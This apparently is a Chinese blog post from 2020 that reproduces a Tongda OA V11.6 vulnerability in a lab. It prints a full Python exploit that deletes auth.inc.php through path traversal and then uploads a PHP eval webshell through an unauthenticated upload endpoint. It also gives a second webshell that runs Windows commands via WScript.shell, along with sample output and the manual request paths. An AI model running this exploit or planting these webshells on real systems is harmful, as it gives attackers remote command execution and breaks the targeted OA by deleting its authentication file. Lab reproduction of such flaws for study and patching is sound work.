环境搭建

通达OA V11.6 下载地址:http://www.kxdw.com/soft/23114.html

下载好之后直接安装即可

4a471597808246.png访问fb5c1597808388.png

使用默认账号admin 密码空 登入

10fb1597808622.png

提示:该漏洞并不是无损的,如果成功利用后会删除程序中的php文件会导致程序功能无法使用

漏洞复现

这里使用exp直接打,利用成功会在根目录下生成一句话_oatest.php密码为t

import requests

payload="<?php eval($_POST['t']);?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
target=input("Please enter URL: ")
input("Press enter to continue!")
print("[*]Deleting auth.inc.php....")
url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[-]Failed to deleted auth.inc.php")
    exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('oatest.php', payload)}
requests.post(url=url,files=files)
url=target+"/_oatest.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[+]Filed Uploaded Successfully")
    print("[+]URL:",url)
else:
    print("[-]Failed to upload file")

运行后输入url然后回车确认运行即可,这里还是提示一下此漏洞并不是无损的!

>exp.py
[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA
Please enter URL: http://192.168.0.110:8080/
Press enter to continue!
[*]Deleting auth.inc.php....
[*]Checking if file deleted...
[+]Successfully deleted auth.inc.php!
[*]Uploading payload...
[+]Filed Uploaded Successfully
[+]URL: http://192.168.0.110:8080//_oatest.php

09dd1597809414.png

来到靶机处查看文件成功被写入

请输入图片描述

默认禁用了一些函数会导致无法执行命令这里使用其他方法去执行

请输入图片描述

<?php
$command=$_GET['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>

执行whoami

请输入图片描述

在次登入发现,页面已经歪瓜裂枣

602e1597810365.png只要把auth.inc.php重新移动到webroot/inc/目录下即可

手工操作的话,

/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php

触发文件删除,将auth.inc.php删除,至于为什么删除他,看到文件名或者上边儿刚刚那个exp应该不少小伙伴就已经明白了,主要是为了给上传做铺垫

general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./

FROM POST上传文件即可

然后就是检查成功没有

/_[filename]

例:http://192.168.0.110:8080/_oatest.php

提示一下没看懂[filename]的小伙伴,你上传的文件名是什么,[filename]就是什么

Last modification:August 19th, 2020 at 12:56 pm
如果觉得我的文章对你有用,请随意赞赏